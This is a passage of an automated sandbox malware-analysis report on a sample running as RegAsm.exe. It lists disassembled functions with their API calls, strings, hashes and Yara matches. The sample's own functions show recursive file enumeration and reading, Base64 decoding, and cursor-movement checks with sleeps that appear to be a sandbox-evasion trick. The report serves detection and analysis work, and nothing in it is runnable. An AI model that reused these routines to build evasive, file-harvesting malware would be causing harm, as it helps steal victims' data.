?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C0C52FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0C536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0C53F7

Part of subcall function 6C0BAB89: EnterCriticalSection.KERNEL32(6C10E370,?,?,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284), ref: 6C0BAB94
Part of subcall function 6C0BAB89: LeaveCriticalSection.KERNEL32(6C10E370,?,6C0834DE,6C10F6CC,?,?,?,?,?,?,?,6C083284,?,?,6C0A56F6), ref: 6C0BABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C0C56C3
__Init_thread_footer.LIBCMT ref: 6C0C56E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C0C56BE

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 6a3bee71eefd3a2b8def233ead323ae6127658c181b9ff9a54bdcbe00c967497
Instruction ID: 456ed96d96cd51c1b3c7e18f4a3ac2b57721ea8ba053b3cac7bea1905c0ca3ee
Opcode Fuzzy Hash: 6a3bee71eefd3a2b8def233ead323ae6127658c181b9ff9a54bdcbe00c967497
Instruction Fuzzy Hash: AEE18279A18F45CAC712CF35C45026BB7F9BF9B384F109B0EE8AA2A550DF70E4469742

Function 0040CD37 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040CD5C
FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
StrCmpCA.SHLWAPI(?,004374EC), ref: 0040CD94
StrCmpCA.SHLWAPI(?,004374F0), ref: 0040CDAE

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(0040D3B5,00436872,004374F4,?,0043686F), ref: 0040CE41

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040D23C
FindClose.KERNEL32(?), ref: 0040D250

Strings

%s\*.*, xrefs: 0040CD56

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 833390005-1013718255
Opcode ID: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction ID: 06796af3159d5870cfde4b437f7530c4b10063cc36196476c106a896cedecc2d
Opcode Fuzzy Hash: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction Fuzzy Hash: C6D1DA71A4112DABDF20FB25DD46ADD77B5AF44308F4100E6A908B3152DB78AFCA8F94

Function 6C0E7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C0E7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C0E7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0E707E

Part of subcall function 6C0981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0981DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0E7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0E709C
LocalFree.KERNEL32(?), ref: 6C0E70AA

Strings

(null), xrefs: 6C0E706A, 6C0E7083
### ERROR: %s: %s, xrefs: 6C0E7087

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 43133e1bd980f2c232fb588a62f233348f80a937c23d76e393053b90635c39b4
Instruction ID: 353afa15eb828304f7993d4abc74a200cb81b271a10235b6958f6add6d53c1d6
Opcode Fuzzy Hash: 43133e1bd980f2c232fb588a62f233348f80a937c23d76e393053b90635c39b4
Instruction Fuzzy Hash: 5E01B9B1B00108AFDB009B65DC4EDAF7BBCEF49655F010429FA05E3241EF71A9148BA1

Function 6C0D2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0D2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0D2C61

Part of subcall function 6C084DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C084E5A
Part of subcall function 6C084DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C084E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0D2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0D2E2D

Part of subcall function 6C0981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0981DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C0D2E3B
expected a Time entry, xrefs: 6C0D2E36
(root), xrefs: 6C0D354F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: dd5171e027c59caf13dbec94c71284808abe95d518cb62f06fa576d276f4055c
Instruction ID: 1a08d03f5ec650679e177e3f5fb11e72350634dc8762a25ab6f116bcd9498694
Opcode Fuzzy Hash: dd5171e027c59caf13dbec94c71284808abe95d518cb62f06fa576d276f4055c
Instruction Fuzzy Hash: A991BF706087818FCB24CF24C48479FB7F1AF89358F514A1DE99A9B751EB30E94ACB52

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 6C0E9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C0E9F3D
__aulldiv.LIBCMT ref: 6C0E9F77
__aullrem.LIBCMT ref: 6C0E9F8C
__aulldiv.LIBCMT ref: 6C0EA023

Strings

NaN, xrefs: 6C0E9EAB
-Infinity, xrefs: 6C0E9E60, 6C0E9E7B

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 3b017aae3440f12d2ad185a229cf1f3973013759d4707dd1014f6782d33b14a2
Instruction ID: 211fb9804048041dcf06deb00bf8cd8e94f1a753a4bc3f9d2e14d5fa73e97af4
Opcode Fuzzy Hash: 3b017aae3440f12d2ad185a229cf1f3973013759d4707dd1014f6782d33b14a2
Instruction Fuzzy Hash: 43C1AD31E443188FDB14CFA8C8907DEBBF6BB8C718F644529D415ABB80DB71A949CB91

Function 0040B93F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
FindClose.KERNEL32(?), ref: 0040BF05

Strings

\*.*, xrefs: 0040B965

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2390431556-1173974218
Opcode ID: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction ID: 085151aa20985cc1c24b900562e2038c57bb153a1e06efcc5d93ab1db404d891
Opcode Fuzzy Hash: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction Fuzzy Hash: 34E1DA7194012D9BCF21FB26DD4AACDB375AF44309F4100E6A508B71A1DB79AFC98F98

Function 6C0EB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C099B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C0EB92D), ref: 6C099BC8
Part of subcall function 6C099B80: __Init_thread_footer.LIBCMT ref: 6C099BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0903D4,?), ref: 6C0EB955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C0EB9A5
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,00000000), ref: 6C0EBA20
RtlNtStatusToDosError.NTDLL ref: 6C0EBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C0EBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C0EBA86

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: c2823eac594435e19466d3380ed9b6747a2c7e83dcbdf5bdb6da66e9c8be9a7c
Instruction ID: 6a5b0407a0e42341297252a7d8acf5e40c7ac8f733660ea0a3d0323c1cac4e8f
Opcode Fuzzy Hash: c2823eac594435e19466d3380ed9b6747a2c7e83dcbdf5bdb6da66e9c8be9a7c
Instruction Fuzzy Hash: 4F513871E41229DFDF18CFA8D985BDEB7F6AB8C314F184129E901A7A04DB30A9458B94

Function 0042B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148

Strings

OCP, xrefs: 0042B0EC
ACP, xrefs: 0042B0DB

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1

Function 6C0C8AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0BFA80: GetCurrentThreadId.KERNEL32 ref: 6C0BFA8D
Part of subcall function 6C0BFA80: AcquireSRWLockExclusive.KERNEL32(6C10F448), ref: 6C0BFA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0E1563), ref: 6C0C8BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0E1563), ref: 6C0C8C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C0E1563), ref: 6C0C8C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C0E1563), ref: 6C0C8CBA
free.MOZGLUE(?), ref: 6C0C8CCF

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: c20c4c2f1204a0b2df6231b4564e2a5f81e84f1a15384f4fbc60aaafa929e299
Instruction ID: 79d4578643cc5d963779863bb75f4146205e9efa877c8a0779d9b30b261bd2d1
Opcode Fuzzy Hash: c20c4c2f1204a0b2df6231b4564e2a5f81e84f1a15384f4fbc60aaafa929e299
Instruction Fuzzy Hash: 4E718C75A14B008FD708CF29C48066AB7F1FF99318F558A5EE9999B722E770F884CB41

Function 6C08F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,?,00000000,?,0000001C,?), ref: 6C08F2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6C08F2F0
NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6C08F308
RtlNtStatusToDosError.NTDLL ref: 6C08F36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C08F371

Memory Dump Source

